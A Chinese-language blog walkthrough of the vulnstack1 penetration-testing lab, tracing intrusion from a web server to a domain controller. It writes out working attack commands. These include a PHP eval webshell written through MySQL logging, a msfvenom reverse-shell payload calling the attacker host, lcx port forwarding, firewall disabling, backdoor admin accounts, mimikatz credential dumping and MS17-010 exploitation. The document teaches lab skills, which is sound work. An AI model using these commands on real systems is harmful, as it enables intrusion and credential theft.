freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次内网渗透 ATT&CK靶场 vulnstack1
2021-10-06 10:42:47

本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。

vulnstack内网渗透环境靶场-1

靶场下载地址:

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

网络拓扑图:

1633482615_615cf777906eec6268a14.png!small?1633482621269

基本信息

win7为VM1,win2003为VM2,win2008为VM3

原始密码为hongrisec@2019

可自行修改

0x01环境配置 

攻击机:

kali ip:192.168.162.81

winXp ip: 192.168.162.137

靶机:

win7 外网ip:192.168.162.7   内网ip:192.168.225.7

win2003 ip: 192.168.225.3

win2008 ip: 192.168.225.8

配置完后,有个小tips

win 7是无法直接ping的,因为有防火墙,只能访问即可,如果有需要可以关闭防火墙

在win7主机中使用phpstudy开启环境

开始渗透

0x02 信息收集

nmap扫描存活主机

nmap -sP 192.168.162.1/24

1633483401_615cfa897e1628a1bc976.png!small?1633483407201

端口扫描

nmap -sT 192.168.162.7

nmap -sS 192.168.162.7

扫描发现开放了80、3306端口

1633483422_615cfa9e1378849025b79.png!small?1633483427647

有80端口,浏览器访问

有phpStudy探针,网站根路径是C:/phpStudy111/WWW

1633483453_615cfabd1e5dca98805ad.png!small?1633483458611

3306端口,测试下弱口令root/root

1633483481_615cfad9bfc535495d341.png!small?1633483487269

1633483506_615cfaf21cfb403c60000.png!small?1633483511668

接下来扫描目录

方式一

1633483536_615cfb10ec662713558d4.png!small?1633483542557

方式二

使用dirsearch,github地址

0x03 拿webshell

访问phpmyadmin,使用root/root可以正常登录

1633483712_615cfbc001f28e55e7071.png!small?1633483717534

查看是否有写入权限

show VARIABLES like '%secure%';

mysql中的 secure_file_priv参数,它的默认值是NULL,表示限制不能导入导出

1633483731_615cfbd33068cdf7640c6.png!small?1633483736646

方式一

尝试日志写 shell

查看当前的日志目录:show variables like 'general%';

没有开启

1633483756_615cfbec6632f174da423.png!small?1633483762097

开启日志记录:set global general_log = "ON";

根据探针的服务器绝对路径C:/phpStudy111/WWW

指定日志文件:set global general_log_file = "C:/phpStudy111/WWW/shell.php";

1633483771_615cfbfbb6ecd19e0543b.png!small?1633483777215

将一句话木马写入指定的日志文件中

SELECT '<?php eval($_POST["shell"]);?>'

用管理工具连接http://192.168.162.7/shell.php

1633483787_615cfc0ba382593d126bc.png!small?1633483793375

方式二

查阅目录,发现还有yxcms

1633483840_615cfc40c6414e7f9442f.png!small?1633483846359

试着访问一下

1633483850_615cfc4a66121a50c002c.png!small?1633483855989

查看页面,提示有后台

1633483859_615cfc537f257c19a0297.png!small?1633483865100

访问后台

CMS相关系列,拿到后台,找模板编辑写入一句话1633483878_615cfc66381553a70f30d.png!small?1633483883824

拿到shell

1633483911_615cfc8769a862be16325.png!small?1633483917099

0x04 权限维持/提升

现在已经拿到webshell了,接着就是持久化控制这个shell

尝试远程登录

查看当前用户权限

1633484023_615cfcf779b3519e00e43.png!small?1633484028934

查看一下3389端口开放情况 netstat -an | find "3389"

我们使用以下命令(注册表命令)开启它(win7、win2003、winxp),运行后显示3389端口已经成功开启(关闭命令把如下0都换成1):

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

1633484038_615cfd067aee96a86d73c.png!small?1633484043966

查看防火墙状况netsh firewall show state

关闭防火墙命令:netsh advfirewall set allprofiles state off #off换成on则开启

查看是什么操作系统 & 系统版本:

系统中文:systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"

系统英文:systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

查询进程及服务:

tasklist,默认显示映像名称,PID,会话名,会话,内存使用

1633484058_615cfd1a988a52f5e19a1.png!small?1633484064107

添加用户,加管理员组权限

net user mdp1234 root@2021 /add  #添加账户密码

net localgroup administrators mdp1234 /add  #给mdp1234账户添加为管理员权限

net user mdp1234  #查询是否成功添加mdp1234用户

1633484071_615cfd274eabd38e7a956.png!small?1633484076769

远程连接3389,失败

1633484097_615cfd4169d2727e7df01.png!small?1633484102995

nmap扫描3389端口发现状态为filtered

nmap -sS -p 3389 192.168.162.7

1633484108_615cfd4c4780bea9225c8.png!small?1633484114098

查看win7,防火墙开启了阻止所有与未在允许程序列表中的程序的连接,设置了白名单。

1633484130_615cfd620b21e7a080212.png!small?1633484135581

1633484139_615cfd6b677455c050dae.png!small?1633484144992

要连接3389有如下思路:

1.尝试命令关闭防火墙,然后连接(动作太大)

2.使用命令行直接添加一个防火墙规则

3.反弹一个msf的shell回来,尝试开启远程桌面

4.尝试使用隧道连接3389(使用sunny-ngrok)

示例2:使用命令行直接添加一个防火墙规则

使用命令行直接添加规则允许3389端口流量一个防火墙规则

netsh advfirewall firewall add rule name="Lcx"

dir=in action=allow program="C:\phpStudy111\WWW\Lcx.exe" enable=yes

1633484213_615cfdb565e62a149e913.png!small?1633484218863

使用lcx.exe 来绕过防火墙

攻击机上执行Lcx.exe -listen 8444 3333

工具上传lcx

Lcx.exe -slave <攻击机ip> 8444 127.0.0.1 3389

在本机上远程桌面连接127.0.0.1的3333端口

1633484271_615cfdef21e8f55205598.png!small?1633484276597

1633484291_615cfe03a8d43172e1f43.png!small?1633484297138

示例3:反弹一个msf的shell回来,尝试开启远程桌面

使用msfvenom生成payload文件,上传到win7

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.162.81 LPORT=5555 -f exe > shell.exe

msf开启监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.162.81

set LPORT 5555

options查看具体payload信息

exploit

1633484315_615cfe1b3b3acdb16d716.png!small?1633484320805

Winxp管理工具上执行shell.exe

1633484395_615cfe6b477c279d2366c.png!small?1633484400910

background  #返回,把meterpreter后台挂起

sessions -i  #查看已经获取的会话

sessions -i 1  #连接到指定序号的meterpreter会话已继续利用

1633484416_615cfe804ed242fc06470.png!small?1633484422269

拿到了meterpreter的shell,提权到system

1633484436_615cfe94c666771293037.png!small?1633484442369

开启远程桌面

run post/windows/manage/enable_rdp

1633484456_615cfea88a02d7a8143be.png!small?1633484462426

成功开启了远程桌面,并且生成了一个txt文件,用来关闭远程桌面

/root/.msf4/loot/20211005144310_default_192.168.162.7_host.windows.cle_639890.txt

关闭远程桌面:run multi_console_command -r 文件地址

连接远程桌面

1633484492_615cfecc4c591dce2d526.png!small?1633484497799

对于非服务器版本的windows 远程登录的话,断开该主机当前的连接,可能会惊动管理员。

0x05 mimikatz破解密码

方式一、

上传一个mimikatz,然后执行

mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

右键编辑

1633484583_615cff273b6347bbd861b.png!small?1633484588761

1633484590_615cff2eb220a8801627b.png!small?1633484596222

方法二:kiwi模块、mimikatz模块

ps  #查看进程ID

ps | find "explorer"

migrate 512     # 模块默认是加载32位的系统,先将meterpreter迁移到64位的进程,而且需要是system权限运行的

load kiwi

creds_all  # 列举系统中的明文密码

1633484712_615cffa8ef2965650b9f0.png!small?1633484718669

1633484734_615cffbe9004b137b6cef.png!small?1633484740106

mimikatz模块

load mimikatz

mimikatz_command -f sekurlsa::searchPasswords

1633484754_615cffd2334e90fe41b0c.png!small?1633484759975

疑问?

不知道是不是mimikatz版本的原因,命令执行完后获取不到明文密码

0x06 内网信息收集

判断是否存在域

使用 ipconfig /all 查看 DNS 服务器

1633484924_615d007c4d6325be200b2.png!small?1633484929770

发现 DNS 服务器名为 god.org

有内网ip

1633484944_615d00903fc7817ad0dbe.png!small?1633484949731

查看域信息:net view

1633484957_615d009d2fd6243d9a0e3.png!small?1633484962678

查看主域信息:net view /domain

1633484966_615d00a6c2b0b18bfecf5.png!small?1633484972234

查询当前的登录域与用户信息:net config workstation

1633484975_615d00afaef64d59ba6c2.png!small?1633484981176

判断主域 net time /domain

1633484985_615d00b9830ecac392c65.png!small?1633484990978

查找域控

利用 nslookup 命令直接解析域名服务器:nslookup god.org

查看当前域的所有用户:net user /domain

1633484995_615d00c3eaf780bd37898.png!small?1633485001391

查看路由信息 route print

1633485005_615d00cd2ac810961afd6.png!small?1633485010642

查看域管理员的名字net group "domain admins" /domain

1633485017_615d00d90026a7f90101b.png!small?1633485022425

收集到的信息:

域名为god.org

域控为OWA$

域管理员为Administrator

域内有三个用户:Administrator、ligang、liukaifeng01

域内三台主机:ROOT-TVI862UBEH、STU1(win7)、OWA

密码为hongrisec@2021

内网网段为192.168.225.1/24

拿到域控IP192.168.225.8

1633485066_615d010aee70787d9b885.png!small?1633485072425

0x07 横向探测

探测内网其他主机:

方式一

使用cmd,用个for循环

1633485138_615d0152703c172956ce2.png!small?1633485143976

方式二

use auxiliary/scanner/netbios/nbname  #使用模块扫描存活主机

1633485168_615d017089ce9c94d4155.png!small?1633485174183

没执行成功,需要先添加msf内网路由

1633485184_615d0180130933083b628.png!small?1633485189599

1633485259_615d01cb3ab0e3451c576.png!small?1633485264784

至此

内网IP

域控192.168.225.8

web网关服务器192.168.225.7

还有一个域成员192.168.225.3

0x08 横向渗透

msf添加对内网的路由

扫描对应主机的端口

use auxiliary/scanner/portscan/tcp  #使用msf的扫描端口模块

1633485316_615d0204cf97d6e602624.png!small?1633485322581

也可以直接扫描内网ms17_010

background

use auxiliary/scanner/smb/smb_ms17_010

有445端口,整一波ms17-010

漏洞利用

搜索search ms17-010

use exploit/windows/smb/ms17_010_eternalblue

1633485377_615d02412ae35c58b751b.png!small?1633485383030

失败给整蓝屏了

1633485396_615d0254750ed76f73d46.png!small?1633485402063

加入代理

攻击机是162段的,内网是225段的,攻击机是无法直接访问225段,只能通过在刚拿下的win7上做个代理,通过225.7就可以访问其他225段的服务器

而刚刚做的路由,只是让msf能访问到225段,这个是让整个攻击机访问

设置代理,设置成功后打开其他程序需在前面加上proxychains

use auxiliary/server/socks4a

run

命令jobs查看是否有任务在执行

1633485469_615d029d2b3e0c870d63f.png!small?1633485474717

1633485484_615d02ac8fcb10fb2831f.png!small?1633485490111

打开/etc/proxychains.conf,设置socks4

1633485536_615d02e084266f16adba1.png!small?1633485542013

测试

proxychains nmap -p 3389 -Pn -sT 192.168.225.3  #扫描3389端口

proxychains nmap -p 445 -Pn -sT 192.168.225.3 #扫描445端口

1633485587_615d03132e5364ea00655.png!small?1633485592727

1633485596_615d031ceb90862684855.png!small?1633485602511

开启3389

使用auxiliary/admin/smb/ms17_010_command来执行一些命令

use auxiliary/admin/smb/ms17_010_command

show options

set RHOSTS 192.168.225.3

set command net user mdp1234 root@2021 /add #添加用户

run #成功执行

set command net localgroup administrators mdp1234 /add #管理员权限

run #成功执行

set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'

run #成功执行

1633485655_615d03573baa04ca62431.png!small?1633485660780

连接成功

1633485684_615d0374b8678ba02eaf9.png!small?1633485690221

使用exploit/windows/smb/ms17_010_psexec 尝试打一个正向shell回来

1633485731_615d03a3ef4aad7c74252.png!small?1633485737574

2003的机器,直接getsystem

exit# 终止 meterpreter 会话

1633485803_615d03eb98fe4ce1c79d6.png!small?1633485809307

域控也开放了445端口,接下相同方式来拿域控192.168.225.8,但有防火墙正向连接不了

域控有防火墙,所以使用ms17_010的远程命令执行关闭防火墙

使用auxiliary/admin/smb/ms17_010_command来执行命令

set command netsh advfirewall set allprofiles state off

接着使用exploit/windows/smb/ms17_010_psexec 尝试打一个正向shell回来

1633485913_615d04599258813e1d59a.png!small?1633485919392

拿下域控

1633485939_615d0473d12017dd824bf.png!small?1633485945509

疑问?如果不关闭域控防火墙,还有什么样的方式可以拿下域控

以上涉及的内网知识可能比较基础,师傅们见谅。

文中有两个疑问,希望有师傅能解答一下!

未完待续。。。

# web安全 # 内网渗透 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录